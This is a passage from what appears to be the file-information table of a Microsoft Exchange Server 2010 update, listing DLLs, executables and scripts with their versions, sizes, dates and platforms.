46,504| 03-Jan-2020| 05:46| x64 \nMsexchangeadtopologyservice.exe| 14.3.470.0| 114,096| 03-Jan-2020| 05:50| x64 \nMsexchangefds.exe| 14.3.470.0| 110,280| 03-Jan-2020| 05:46| x86 \nMsexchangelesearchworker.exe| 14.3.487.0| 89,808| 03-Jan-2020| 05:47| x86 \nMsexchangemailboxassistants.exe| 14.3.487.0| 802,512| 03-Jan-2020| 05:46| x86 \nMsexchangemailboxreplication.exe| 14.3.470.0| 27,272| 03-Jan-2020| 05:46| x86 \nMsexchangemailsubmission.exe| 14.3.487.0| 118,480| 03-Jan-2020| 05:46| x86 \nMsexchangerepl.exe| 14.3.487.0| 69,328| 03-Jan-2020| 05:46| x86 \nMsexchangethrottling.exe| 14.3.470.0| 48,840| 03-Jan-2020| 05:46| x86 \nMsexchangetransport.exe| 14.3.470.0| 81,544| 03-Jan-2020| 05:46| x86 
\nMsexchangetransportlogsearch.exe| 14.3.487.0| 212,688| 03-Jan-2020| 05:48| x86 \nMsfte1.dll| 14.0.7177.5001| 3,228,440| 03-Jan-2020| 05:48| x64 \nMsgedt.js| Not applicable| 4,778| 03-Jan-2020| 05:46| Not applicable \nMsglst.js| Not applicable| 3,295| 03-Jan-2020| 05:46| Not applicable \nNewtestcasconnectivityuser.ps1| Not applicable| 20,120| 03-Jan-2020| 05:47| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 22,443| 03-Jan-2020| 05:47| Not applicable \nNtspxgen.dll| 14.3.470.0| 87,472| 03-Jan-2020| 05:45| x64 \nOabgen.dll| 14.3.470.0| 356,784| 03-Jan-2020| 05:48| x64 \nOcemul.dll| 8.5.3.76| 54,112| 03-Jan-2020| 05:49| x64 \nOilink.dll| 8.5.3.76| 464,736| 03-Jan-2020| 05:49| x86 \nOilink.exe| 8.5.3.76| 317,280| 03-Jan-2020| 05:49| x64 \nOilink.jar| Not applicable| 1,425,202| 03-Jan-2020| 05:49| Not applicable \nOitnsf.id| Not applicable| 4,688| 03-Jan-2020| 05:49| Not applicable \nOit_font_metrics.db| Not applicable| 375,808| 03-Jan-2020| 05:49| Not applicable \nOleconverter.exe| 14.3.470.0| 162,736| 03-Jan-2020| 05:46| x64 \nOswin64.dll| 8.5.3.76| 103,272| 03-Jan-2020| 05:49| x64 \nOutsidein.dll| 8.5.3.76| 296,296| 03-Jan-2020| 05:49| x86 \nOwaauth.dll| 14.3.470.0| 104,880| 03-Jan-2020| 05:46| x64 \nOwasl.xap| Not applicable| 36,280| 03-Jan-2020| 05:46| Not applicable \nOwasmime.msi| Not applicable| 2,297,856| 03-Jan-2020| 05:45| Not applicable \nOwaspell.dll| 14.3.470.0| 50,608| 03-Jan-2020| 05:49| x64 \nPerfnm.h| Not applicable| 47,627| 03-Jan-2020| 05:50| Not applicable \nPerf_common_extrace.dll| 14.3.470.0| 170,416| 03-Jan-2020| 05:48| x64 \nPerf_exchmem.dll| 14.3.470.0| 71,600| 03-Jan-2020| 05:48| x64 \nPerf_mdbsz.dll| 14.3.470.0| 56,752| 03-Jan-2020| 05:50| x64 \nPolicytest.exe| 14.3.470.0| 51,632| 03-Jan-2020| 05:48| x64 \nPremium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 68,859| 03-Jan-2020| 05:47| Not applicable \nPrepare_moverequest.ps1| Not applicable| 
69,054| 03-Jan-2020| 05:47| Not applicable \nPublishedstartpage.js| Not applicable| 15,353| 03-Jan-2020| 05:46| Not applicable \nQuietexe.exe| 14.3.470.0| 21,640| 03-Jan-2020| 05:47| x86 \nReadpost.aspx| Not applicable| 6,516| 03-Jan-2020| 05:49| Not applicable \nReadsharingmessage.ascx| Not applicable| 5,235| 03-Jan-2020| 05:49| Not applicable \nReadvoicemailmessage.aspx| Not applicable| 9,320| 03-Jan-2020| 05:49| Not applicable \nRedir.aspx| Not applicable| 1,714| 03-Jan-2020| 05:49| Not applicable \nRedistributeactivedatabases.ps1| Not applicable| 114,387| 03-Jan-2020| 05:47| Not applicable \nReenable_auditloggingagent.ps1| Not applicable| 12,395| 03-Jan-2020| 05:47| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 20,402| 03-Jan-2020| 05:47| Not applicable \nRemoteexchange.ps1| Not applicable| 19,447| 03-Jan-2020| 05:47| Not applicable \nRemovereplicafrompfrecursive.ps1| Not applicable| 13,887| 03-Jan-2020| 05:47| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 13,191| 03-Jan-2020| 05:47| Not applicable \nReplacereplicaonpfrecursive.ps1| Not applicable| 14,292| 03-Jan-2020| 05:47| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 13,551| 03-Jan-2020| 05:47| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 13,547| 03-Jan-2020| 05:47| Not applicable \nReplaycrimsonevents.man| Not applicable| 247,121| 03-Jan-2020| 05:48| Not applicable \nReplaycrimsonmsg.dll| 14.3.470.0| 266,440| 03-Jan-2020| 05:48| x64 \nResetattachmentfilterentry.ps1| Not applicable| 13,332| 03-Jan-2020| 05:47| Not applicable \nResetcasservice.ps1| Not applicable| 19,563| 03-Jan-2020| 05:47| Not applicable \nResetsearchindex.ps1| Not applicable| 14,653| 03-Jan-2020| 05:47| Not applicable \nReset_antispamupdates.ps1| Not applicable| 12,017| 03-Jan-2020| 05:48| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 15,126| 03-Jan-2020| 05:47| Not applicable \nRightsmanagementwrapper.dll| 14.3.470.0| 86,440| 
03-Jan-2020| 05:48| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 53,296| 03-Jan-2020| 05:47| Not applicable \nRoutingview.exe| 14.3.470.0| 167,560| 03-Jan-2020| 05:48| x86 \nRulesauditmsg.dll| 14.3.470.0| 18,864| 03-Jan-2020| 05:48| x64 \nSccanno.dll| 8.5.3.76| 136,552| 03-Jan-2020| 05:49| x64 \nSccca.dll| 8.5.3.76| 46,944| 03-Jan-2020| 05:49| x64 \nSccch.dll| 8.5.3.76| 201,056| 03-Jan-2020| 05:49| x64 \nSccda.dll| 8.5.3.76| 151,904| 03-Jan-2020| 05:49| x64 \nSccdu.dll| 8.5.3.76| 617,824| 03-Jan-2020| 05:49| x64 \nSccex.dll| 8.5.3.76| 94,560| 03-Jan-2020| 05:49| x64 \nSccfa.dll| 8.5.3.76| 86,880| 03-Jan-2020| 05:49| x64 \nSccfi.dll| 8.5.3.76| 143,712| 03-Jan-2020| 05:49| x64 \nSccfmt.dll| 8.5.3.76| 75,616| 03-Jan-2020| 05:49| x64 \nSccfnt.dll| 8.5.3.76| 504,160| 03-Jan-2020| 05:49| x64 \nSccfut.dll| 8.5.3.76| 862,560| 03-Jan-2020| 05:49| x64 \nSccimg.dll| 8.5.3.76| 426,848| 03-Jan-2020| 05:49| x64 \nSccind.dll| 8.5.3.76| 68,960| 03-Jan-2020| 05:49| x64 \nScclo.dll| 8.5.3.76| 162,656| 03-Jan-2020| 05:49| x64 \nSccole2.dll| 8.5.3.76| 30,568| 03-Jan-2020| 05:49| x64 \nSccsd.dll| 8.5.3.76| 43,360| 03-Jan-2020| 05:49| x64 \nSccut.dll| 8.5.3.76| 2,001,248| 03-Jan-2020| 05:49| x64 \nSccxt.dll| 8.5.3.76| 54,624| 03-Jan-2020| 05:49| x64 \nServicecontrol.ps1| Not applicable| 45,721| 03-Jan-2020| 05:47| Not applicable \nSetup.com| 14.3.470.0| 444,928| 03-Jan-2020| 05:47| Not applicable \nSetup.exe| 14.3.470.0| 603,568| 03-Jan-2020| 05:47| x64 \nSmimeoptions.aspx| Not applicable| 10,805| 03-Jan-2020| 05:49| Not applicable \nSmimeparameterstandalone.js| Not applicable| 10,566| 03-Jan-2020| 05:47| Not applicable \nSmtpreceiveperfcounters.h| Not applicable| 1,014| 03-Jan-2020| 05:46| Not applicable \nSmtpreceiveperfcounters.ini| Not applicable| 11,910| 03-Jan-2020| 05:50| Not applicable \nSmtpreceiveperfcounters.xml| Not applicable| 3,439| 03-Jan-2020| 05:50| Not applicable \nSmtpsendperfcounters.h| Not applicable| 739| 03-Jan-2020| 05:50| Not applicable 
\nSmtpsendperfcounters.ini| Not applicable| 8,488| 03-Jan-2020| 05:50| Not applicable \nSmtpsendperfcounters.xml| Not applicable| 2,527| 03-Jan-2020| 05:50| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 22,566| 03-Jan-2020| 05:47| Not applicable \nStartpage.aspx| Not applicable| 10,891| 03-Jan-2020| 05:49| Not applicable \nStartpage.js| Not applicable| 177,388| 03-Jan-2020| 05:46| Not applicable \nStopdagservermaintenance.ps1| Not applicable| 15,837| 03-Jan-2020| 05:47| Not applicable \nStore.exe| 14.3.470.0| 6,941,640| 03-Jan-2020| 05:48| x64 \nStoretsconstants.ps1| Not applicable| 15,592| 03-Jan-2020| 05:49| Not applicable \nStoretslibrary.ps1| Not applicable| 25,360| 03-Jan-2020| 05:49| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 14.3.470.0| 37,296| 03-Jan-2020| 05:46| x64 \nTokenm.dll| 14.3.470.0| 66,984| 03-Jan-2020| 05:46| x64 \nTranscodingservice.exe| 14.3.470.0| 130,992| 03-Jan-2020| 05:46| x64 \nTroubleshoot_ci.ps1| Not applicable| 24,393| 03-Jan-2020| 05:49| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 23,679| 03-Jan-2020| 05:49| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 29,030| 03-Jan-2020| 05:49| Not applicable \nUglobal.js| Not applicable| 984,109| 03-Jan-2020| 05:46| Not applicable \nUmservice.exe| 14.3.470.0| 147,080| 03-Jan-2020| 05:46| x86 \nUmworkerprocess.exe| 14.3.470.0| 56,968| 03-Jan-2020| 05:48| x86 \nUninstall_antispamagents.ps1| Not applicable| 12,489| 03-Jan-2020| 05:48| Not applicable \nUpdatecas.ps1| Not applicable| 16,662| 03-Jan-2020| 05:47| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 24,906| 03-Jan-2020| 05:47| Not applicable \nUview.js| Not applicable| 178,233| 03-Jan-2020| 05:46| Not applicable \nVlv.js| Not applicable| 140,614| 03-Jan-2020| 05:46| Not applicable \nVsacad.dll| 8.5.3.76| 14,228,832| 03-Jan-2020| 05:49| x64 \nVsacs.dll| 8.5.3.76| 41,824| 03-Jan-2020| 05:49| x64 \nVsami.dll| 8.5.3.76| 74,592| 03-Jan-2020| 05:49| x64 \nVsarc.dll| 
8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVsasf.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:49| x64 \nVsbdr.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVsbmp.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVscdrx.dll| 8.5.3.76| 22,880| 03-Jan-2020| 05:49| x64 \nVscgm.dll| 8.5.3.76| 53,600| 03-Jan-2020| 05:49| x64 \nVsdbs.dll| 8.5.3.76| 26,464| 03-Jan-2020| 05:49| x64 \nVsdez.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsdif.dll| 8.5.3.76| 25,952| 03-Jan-2020| 05:49| x64 \nVsdrw.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:49| x64 \nVsdx.dll| 8.5.3.76| 30,560| 03-Jan-2020| 05:49| x64 \nVsdxla.dll| 8.5.3.76| 32,096| 03-Jan-2020| 05:49| x64 \nVsdxlm.dll| 8.5.3.76| 80,224| 03-Jan-2020| 05:49| x64 \nVsemf.dll| 8.5.3.76| 64,864| 03-Jan-2020| 05:49| x64 \nVsen4.dll| 8.5.3.76| 32,096| 03-Jan-2020| 05:49| x64 \nVsens.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsenw.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:49| x64 \nVseps.dll| 8.5.3.76| 23,904| 03-Jan-2020| 05:49| x64 \nVseshr.dll| 8.5.3.76| 188,768| 03-Jan-2020| 05:49| x64 \nVsexe2.dll| 8.5.3.76| 53,088| 03-Jan-2020| 05:49| x64 \nVsfax.dll| 8.5.3.76| 26,464| 03-Jan-2020| 05:49| x64 \nVsfcd.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVsfcs.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsfft.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsflw.dll| 8.5.3.76| 154,464| 03-Jan-2020| 05:49| x64 \nVsfwk.dll| 8.5.3.76| 45,920| 03-Jan-2020| 05:49| x64 \nVsgdsf.dll| 8.5.3.76| 89,440| 03-Jan-2020| 05:49| x64 \nVsgif.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVsgzip.dll| 8.5.3.76| 37,216| 03-Jan-2020| 05:49| x64 \nVshgs.dll| 8.5.3.76| 50,016| 03-Jan-2020| 05:49| x64 \nVshtml.dll| 8.5.3.76| 517,984| 03-Jan-2020| 05:49| x64 \nVshwp.dll| 8.5.3.76| 91,488| 03-Jan-2020| 05:49| x64 \nVshwp2.dll| 8.5.3.76| 111,968| 03-Jan-2020| 05:49| x64 \nVsich.dll| 8.5.3.76| 136,032| 03-Jan-2020| 05:49| x64 \nVsich6.dll| 8.5.3.76| 62,816| 03-Jan-2020| 05:49| x64 \nVsid3.dll| 8.5.3.76| 53,088| 03-Jan-2020| 05:49| x64 \nVsimg.dll| 
8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVsindd.dll| 8.5.3.76| 23,904| 03-Jan-2020| 05:49| x64 \nVsinx.dll| 8.5.3.76| 21,344| 03-Jan-2020| 05:49| x64 \nVsiwok.dll| 8.5.3.76| 36,704| 03-Jan-2020| 05:49| x64 \nVsiwok13.dll| 8.5.3.76| 1,409,384| 03-Jan-2020| 05:49| x64 \nVsiwon.dll| 8.5.3.76| 70,496| 03-Jan-2020| 05:49| x64 \nVsiwop.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVsiwp.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsjbg2.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVsjp2.dll| 8.5.3.76| 249,184| 03-Jan-2020| 05:49| x64 \nVsjw.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsleg.dll| 8.5.3.76| 41,312| 03-Jan-2020| 05:49| x64 \nVslwp7.dll| 8.5.3.76| 360,288| 03-Jan-2020| 05:49| x64 \nVslzh.dll| 8.5.3.76| 41,824| 03-Jan-2020| 05:49| x64 \nVsm11.dll| 8.5.3.76| 28,512| 03-Jan-2020| 05:49| x64 \nVsmanu.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVsmbox.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVsmcw.dll| 8.5.3.76| 44,384| 03-Jan-2020| 05:49| x64 \nVsmdb.dll| 8.5.3.76| 45,920| 03-Jan-2020| 05:49| x64 \nVsmif.dll| 8.5.3.76| 217,952| 03-Jan-2020| 05:49| x64 \nVsmime.dll| 8.5.3.76| 135,008| 03-Jan-2020| 05:49| x64 \nVsmm.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:49| x64 \nVsmm4.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:49| x64 \nVsmmfn.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsmp.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsmpp.dll| 8.5.3.76| 249,696| 03-Jan-2020| 05:49| x64 \nVsmsg.dll| 8.5.3.76| 96,096| 03-Jan-2020| 05:49| x64 \nVsmsw.dll| 8.5.3.76| 46,432| 03-Jan-2020| 05:49| x64 \nVsmwkd.dll| 8.5.3.76| 26,464| 03-Jan-2020| 05:49| x64 \nVsmwks.dll| 8.5.3.76| 25,440| 03-Jan-2020| 05:49| x64 \nVsmwp2.dll| 8.5.3.76| 49,504| 03-Jan-2020| 05:49| x64 \nVsmwpf.dll| 8.5.3.76| 34,656| 03-Jan-2020| 05:49| x64 \nVsmwrk.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVsnsf.dll| 8.5.3.76| 38,240| 03-Jan-2020| 05:49| x64 \nVsolm.dll| 8.5.3.76| 153,952| 03-Jan-2020| 05:49| x64 \nVsone.dll| 8.5.3.76| 81,760| 03-Jan-2020| 05:49| x64 
\nVsow.dll| 8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVspbm.dll| 8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVspcl.dll| 8.5.3.76| 23,392| 03-Jan-2020| 05:49| x64 \nVspcx.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:49| x64 \nVspdf.dll| 8.5.3.76| 260,448| 03-Jan-2020| 05:49| x64 \nVspdfi.dll| 8.5.3.76| 278,368| 03-Jan-2020| 05:49| x64 \nVspdx.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVspfs.dll| 8.5.3.76| 41,312| 03-Jan-2020| 05:49| x64 \nVspgl.dll| 8.5.3.76| 59,744| 03-Jan-2020| 05:49| x64 \nVspic.dll| 8.5.3.76| 25,440| 03-Jan-2020| 05:49| x64 \nVspict.dll| 8.5.3.76| 55,136| 03-Jan-2020| 05:49| x64 \nVspng.dll| 8.5.3.76| 53,600| 03-Jan-2020| 05:49| x64 \nVspntg.dll| 8.5.3.76| 22,880| 03-Jan-2020| 05:49| x64 \nVspp12.dll| 8.5.3.76| 131,936| 03-Jan-2020| 05:49| x64 \nVspp2.dll| 8.5.3.76| 72,032| 03-Jan-2020| 05:49| x64 \nVspp7.dll| 8.5.3.76| 77,664| 03-Jan-2020| 05:49| x64 \nVspp97.dll| 8.5.3.76| 227,680| 03-Jan-2020| 05:49| x64 \nVsppl.dll| 8.5.3.76| 39,264| 03-Jan-2020| 05:49| x64 \nVspsd.dll| 8.5.3.76| 23,904| 03-Jan-2020| 05:49| x64 \nVspsp6.dll| 8.5.3.76| 189,792| 03-Jan-2020| 05:49| x64 \nVspst.dll| 8.5.3.76| 82,272| 03-Jan-2020| 05:49| x64 \nVspstf.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsqa.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsqad.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsqp6.dll| 8.5.3.76| 53,600| 03-Jan-2020| 05:49| x64 \nVsqp9.dll| 8.5.3.76| 76,128| 03-Jan-2020| 05:49| x64 \nVsqt.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsrar.dll| 8.5.3.76| 141,152| 03-Jan-2020| 05:49| x64 \nVsras.dll| 8.5.3.76| 24,416| 03-Jan-2020| 05:49| x64 \nVsrbs.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsrft.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:49| x64 \nVsrfx.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVsriff.dll| 8.5.3.76| 28,000| 03-Jan-2020| 05:49| x64 \nVsrtf.dll| 8.5.3.76| 171,872| 03-Jan-2020| 05:49| x64 \nVssam.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:49| x64 \nVssc5.dll| 8.5.3.76| 32,608| 03-Jan-2020| 05:49| x64 
\nVssdw.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsshw3.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVssmd.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVssms.dll| 8.5.3.76| 28,000| 03-Jan-2020| 05:49| x64 \nVssmt.dll| 8.5.3.76| 33,632| 03-Jan-2020| 05:49| x64 \nVssnap.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsso6.dll| 8.5.3.76| 306,016| 03-Jan-2020| 05:49| x64 \nVssoc.dll| 8.5.3.76| 43,360| 03-Jan-2020| 05:49| x64 \nVssoc6.dll| 8.5.3.76| 285,536| 03-Jan-2020| 05:49| x64 \nVssoi.dll| 8.5.3.76| 40,800| 03-Jan-2020| 05:49| x64 \nVssoi6.dll| 8.5.3.76| 304,992| 03-Jan-2020| 05:50| x64 \nVssow.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:50| x64 \nVsspt.dll| 8.5.3.76| 28,000| 03-Jan-2020| 05:50| x64 \nVsssml.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVsswf.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:50| x64 \nVstaz.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:50| x64 \nVstext.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:50| x64 \nVstga.dll| 8.5.3.76| 26,976| 03-Jan-2020| 05:50| x64 \nVstif6.dll| 8.5.3.76| 103,776| 03-Jan-2020| 05:50| x64 \nVstw.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:50| x64 \nVstxt.dll| 8.5.3.76| 38,752| 03-Jan-2020| 05:50| x64 \nVsvcrd.dll| 8.5.3.76| 82,272| 03-Jan-2020| 05:50| x64 \nVsviso.dll| 8.5.3.76| 205,664| 03-Jan-2020| 05:50| x64 \nVsvsdx.dll| 8.5.3.76| 47,456| 03-Jan-2020| 05:50| x64 \nVsvw3.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVsw12.dll| 8.5.3.76| 221,536| 03-Jan-2020| 05:50| x64 \nVsw6.dll| 8.5.3.76| 138,080| 03-Jan-2020| 05:50| x64 \nVsw97.dll| 8.5.3.76| 236,896| 03-Jan-2020| 05:50| x64 \nVswbmp.dll| 8.5.3.76| 22,368| 03-Jan-2020| 05:50| x64 \nVswg2.dll| 8.5.3.76| 47,968| 03-Jan-2020| 05:50| x64 \nVswk4.dll| 8.5.3.76| 103,264| 03-Jan-2020| 05:50| x64 \nVswk6.dll| 8.5.3.76| 154,464| 03-Jan-2020| 05:50| x64 \nVswks.dll| 8.5.3.76| 48,480| 03-Jan-2020| 05:50| x64 \nVswm.dll| 8.5.3.76| 30,048| 03-Jan-2020| 05:50| x64 \nVswmf.dll| 8.5.3.76| 45,920| 03-Jan-2020| 05:50| x64 \nVswml.dll| 8.5.3.76| 68,960| 03-Jan-2020| 05:50| x64 
\nVsword.dll| 8.5.3.76| 86,880| 03-Jan-2020| 05:50| x64 \nVswork.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:50| x64 \nVswp5.dll| 8.5.3.76| 75,616| 03-Jan-2020| 05:50| x64 \nVswp6.dll| 8.5.3.76| 107,360| 03-Jan-2020| 05:50| x64 \nVswpf.dll| 8.5.3.76| 30,560| 03-Jan-2020| 05:50| x64 \nVswpg.dll| 8.5.3.76| 48,480| 03-Jan-2020| 05:50| x64 \nVswpg2.dll| 8.5.3.76| 57,184| 03-Jan-2020| 05:50| x64 \nVswpl.dll| 8.5.3.76| 39,264| 03-Jan-2020| 05:50| x64 \nVswpml.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVswpw.dll| 8.5.3.76| 68,448| 03-Jan-2020| 05:50| x64 \nVsws.dll| 8.5.3.76| 37,728| 03-Jan-2020| 05:50| x64 \nVsws2.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVsxl12.dll| 8.5.3.76| 261,472| 03-Jan-2020| 05:50| x64 \nVsxl5.dll| 8.5.3.76| 289,632| 03-Jan-2020| 05:50| x64 \nVsxlsb.dll| 8.5.3.76| 244,064| 03-Jan-2020| 05:50| x64 \nVsxml.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:50| x64 \nVsxmp.dll| 8.5.3.76| 22,368| 03-Jan-2020| 05:50| x64 \nVsxps.dll| 8.5.3.76| 51,552| 03-Jan-2020| 05:50| x64 \nVsxy.dll| 8.5.3.76| 35,680| 03-Jan-2020| 05:50| x64 \nVs